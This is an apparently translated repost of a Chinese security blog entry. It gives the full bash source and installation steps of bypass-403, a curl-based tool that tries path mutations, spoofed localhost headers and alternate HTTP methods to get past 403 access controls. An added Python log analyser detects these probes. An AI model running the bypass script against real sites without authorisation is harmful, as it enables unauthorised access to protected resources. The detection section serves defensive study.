Bypass-403

admin, 2023-05-23 23:33:45

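        A script for attempting to bypass the HTTP 403 Forbidden status code. It requests the specified URL and path in a number of different ways, to try to uncover vulnerabilities or hidden functionality in the application.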



./bypass-403.sh https://example.com admin
./bypass-403.sh website-here path-here


Installation

git clone https://github.com/iamj0ker/bypass-403
cd bypass-403
chmod +x bypass-403.sh
sudo apt install figlet
sudo apt install jq


https://github.com/iamj0ker/bypass-403


#! /bin/bash
figlet Bypass-403
echo "                                               By Iam_J0ker"
echo "./bypass-403.sh https://example.com path"
echo " "
# Baseline request, then path variants (URL arguments are quoted so the shell does not glob ? and *)
curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$1/$2"
echo "  --> ${1}/${2}"
curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$1/%2e/$2"
echo "  --> ${1}/%2e/${2}"
curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$1/$2/."
echo "  --> ${1}/${2}/."
curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$1//$2//"
echo "  --> ${1}//${2}//"
curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$1/./$2/./"
echo "  --> ${1}/./${2}/./"
# Custom request headers
curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Original-URL: $2" "$1/$2"
echo "  --> ${1}/${2} -H X-Original-URL: ${2}"
curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Custom-IP-Authorization: 127.0.0.1" "$1/$2"
echo "  --> ${1}/${2} -H X-Custom-IP-Authorization: 127.0.0.1"
curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Forwarded-For: http://127.0.0.1" "$1/$2"
echo "  --> ${1}/${2} -H X-Forwarded-For: http://127.0.0.1"
curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Forwarded-For: 127.0.0.1:80" "$1/$2"
echo "  --> ${1}/${2} -H X-Forwarded-For: 127.0.0.1:80"
curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-rewrite-url: $2" "$1"
echo "  --> ${1} -H X-rewrite-url: ${2}"
# Suffix characters and file extensions
curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$1/$2%20"
echo "  --> ${1}/${2}%20"
curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$1/$2%09"
echo "  --> ${1}/${2}%09"
curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$1/$2?"
echo "  --> ${1}/${2}?"
curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$1/$2.html"
echo "  --> ${1}/${2}.html"
curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$1/$2/?anything"
echo "  --> ${1}/${2}/?anything"
curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$1/$2#"
echo "  --> ${1}/${2}#"
# Other HTTP methods and remaining variants
curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "Content-Length:0" -X POST "$1/$2"
echo "  --> ${1}/${2} -H Content-Length:0 -X POST"
curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$1/$2/*"
echo "  --> ${1}/${2}/*"
curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$1/$2.php"
echo "  --> ${1}/${2}.php"
curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$1/$2.json"
echo "  --> ${1}/${2}.json"
curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -X TRACE "$1/$2"
echo "  --> ${1}/${2}  -X TRACE"
curl -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Host: 127.0.0.1" "$1/$2"
echo "  --> ${1}/${2} -H X-Host: 127.0.0.1"
curl -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$1/$2..;/"
echo "  --> ${1}/${2}..;/"
curl -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$1/$2;/"
echo "  --> ${1}/${2};/"
#updated
curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -X TRACE "$1/$2"
echo "  --> ${1}/${2} -X TRACE"
# Look up an archived snapshot of the URL
echo "Way back machine:"
curl -s "https://archive.org/wayback/available?url=$1/$2" | jq -r '.archived_snapshots.closest | {available, url}'


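Specifically, the script does the following:

  • Prints a banner and usage information;

  • Uses curl to request the specified URL and path, to see whether the request succeeds or returns a different status code;

  • Tries several modifications of the URL, such as adding special characters like %2e or %20, to trigger potential vulnerabilities or other problems in the application;

  • Tests file extensions the URL might accept, such as .html and .php;

  • Tries other HTTP request methods, such as POST and TRACE;

  • Tries several custom HTTP headers, such as X-Original-URL, X-Custom-IP-Authorization and X-rewrite-url;

  • Queries the Wayback Machine for a historical snapshot.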
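
Seen from the server side, the requests listed above form a recognisable pattern: one client asks for the same resource under many spellings within seconds. The following is an added example, not part of the original post or of the bypass-403 project; it groups access-log lines by client and de-mutated path and reports any spelling that returned 200 where the plain path returned 403. The log lines are constructed, the names `canonical`, `find_probes` and `min_variants` are assumptions, and only path and method variants are covered because request headers are not in a default access log.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample lines in combined-log style (documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [23/May/2023:23:40:01 +0000] "GET /admin HTTP/1.1" 403 153
203.0.113.7 - - [23/May/2023:23:40:01 +0000] "GET /%2e/admin HTTP/1.1" 403 153
203.0.113.7 - - [23/May/2023:23:40:02 +0000] "GET /admin/. HTTP/1.1" 403 153
203.0.113.7 - - [23/May/2023:23:40:02 +0000] "GET //admin// HTTP/1.1" 200 5120
203.0.113.7 - - [23/May/2023:23:40:03 +0000] "GET /admin%20 HTTP/1.1" 403 153
203.0.113.7 - - [23/May/2023:23:40:03 +0000] "TRACE /admin HTTP/1.1" 405 0
203.0.113.7 - - [23/May/2023:23:40:04 +0000] "GET /admin..;/ HTTP/1.1" 403 153
198.51.100.20 - - [23/May/2023:23:41:10 +0000] "GET /index.html HTTP/1.1" 200 2048
198.51.100.20 - - [23/May/2023:23:41:12 +0000] "GET /admin HTTP/1.1" 403 153
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def canonical(raw):
    """Grouping key that undoes the path mutations (not a full URL resolver)."""
    path = unquote(raw.split("?", 1)[0])  # drop the query, decode %2e %20 %09
    # Per segment: drop ';' path parameters, then trailing dots and whitespace.
    segs = [s.split(";", 1)[0].rstrip(" \t.") for s in path.split("/")]
    return "/" + "/".join(s for s in segs if s and s != "*")

def find_probes(log_text, min_variants=4):
    """Flag clients that requested one resource under many spellings."""
    seen = defaultdict(dict)  # (client, canonical path) -> {(method, raw): status}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if m:
            client, method, raw, status = m.groups()
            seen[(client, canonical(raw))][(method, raw)] = int(status)
    findings = []
    for (client, base), variants in seen.items():
        if len(variants) < min_variants:
            continue
        denied = any(s == 403 for s in variants.values())
        # A 200 alongside a 403 for the same resource means the access rule
        # and the backend disagree about how the path is normalised.
        leaks = sorted(raw for (_, raw), s in variants.items() if denied and s == 200)
        findings.append({"client": client, "path": base,
                         "variants": len(variants), "allowed_after_403": leaks})
    return findings

if __name__ == "__main__":
    for finding in find_probes(SAMPLE_LOG):
        print(finding)
```

A non-empty `allowed_after_403` list is the part to act on: it names the spellings that the deny rule does not match but the application still serves.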


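Note that this script is for learning and research only; do not use it for illegal or unauthorized activity. In practice, more detailed and comprehensive security testing is also needed to ensure the security and stability of the application.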


Originally published on the WeChat official account Khan安全攻防实验室: Bypass-403

  • When reposting, please keep the link to this article (CN-SEC中文网: thanks to the original author for their hard work):
                   Bypass-403 http://cn-sec.com/archives/1751185.html
